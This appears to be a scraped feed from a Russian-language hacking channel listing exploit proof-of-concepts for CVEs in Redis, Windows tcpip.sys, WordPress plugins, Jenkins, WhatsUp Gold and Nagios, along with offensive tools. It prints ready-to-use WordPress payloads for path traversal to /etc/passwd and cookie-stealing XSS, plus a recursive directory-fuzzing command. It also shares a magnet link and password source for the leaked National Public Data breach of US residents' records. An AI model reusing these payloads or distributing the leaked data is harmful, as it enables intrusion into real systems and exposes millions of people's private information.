CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC

#redis #rce

Полезный однострочник для рекурсивного фаззинга

-dirsearch -l urls.txt -e
conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx
~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,con
f,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,ol
d,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,t
ar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-
recursive --force-recursive --exclude-sizes=0B --
random-agent --full-url -o output.txt

#saveIt

Phrack
*
read stuff

CVE-2024-7928 FastAdmin
*
Обход каталога и попытка вытащить креды БД
До версии 1.3.3.20220121
*
POC

NationalPublicData - BD
*
2,7 млрд записей информацией на жителей США
*
National Public Data — шарага, которая собирает жирные объемы приватной инфы, а потом продает, как в медиа так и по запросу. Там и проверка записей из криминальной базы сШа и составление биографических отчетов.
*
Пасс на архив https://usdod.io/ если тянуть с https://usdod.io/


UPDATE

 magnet:?xt=urn:btih:3caa71f3ec8cbccc6fca4feb7185da2bab149ba7&dn=NPD&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337%2Fannounce

#bd

windows IPv6 exploit
опубликован
бесплатно
навсегда
какие30тыщ?

ShellGen
*
Павашэлл скрипт для генерации ShellCode в различных форматах.
Форматы: Raw, ps1, Hex, C, vba, csharp
Архитектура: x64, x86
*
DownLoad

CVE-2024-28000
*
WordPress, дырка в плагине LiteSpeed Cache (слабая проверка хэша)
LPE без аутентификации во всех версиях плагина WordPress до 6.3.0.1
*
POC exploit

Nuclei templates
*
6000 штук

CVE-2024-38063 (RCE in tcpip.sys)
*
POC exploit

Лохматый научился включать свою любимую тапалку с мышками на айпаде
Скоро рутанет

CVE-2024-5932
*
WordPress GiveWP POP to RCE
*
POC exploit

wow
*
c/asm

CVE-2024-43044 Jenkins
*
WriteUP
*
POC exploit

#jenkins

CVE-2024-6670 WhatsUp Gold
*
Статья Exploiting Pre-Auth SQL Injection in WhatsUp Gold
*
POC exploit

Прекрасное в мире плагинов WordPress
*
simple-image-manipulator

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&NAME=NAME%22%3E%3Cnoscript%3Ealert%28document.cookie%29%3C/noscript%3E&

amministrazione-aperta

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

buddypress-component-stats

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery

/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search

/wp-content/plugins/e-search/tmpl/noscript_az.php?noscript_az=%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E

fancy-product-designer

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer

/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

SUDO_KILLER
*
Скрипт под:
Сбор учетных данных
Неправильные конфигурации
Опасные двоичные файлы (GTFOBINS)
Уязвимые версии sudo — CVE
Уязвимость Sudo и неправильная конфигурация, связанные с 3dParty
Опасные переменные окружающей среды
Доступные для записи каталоги, в которых есть скрипты
Двоичные файлы, которые можно заменить/переместить
*
Download + много демо + докер для тестов

#sudo

CVE-2024-24401 NAGIOS
*
Authenticated SQL Injection
*
POC exploit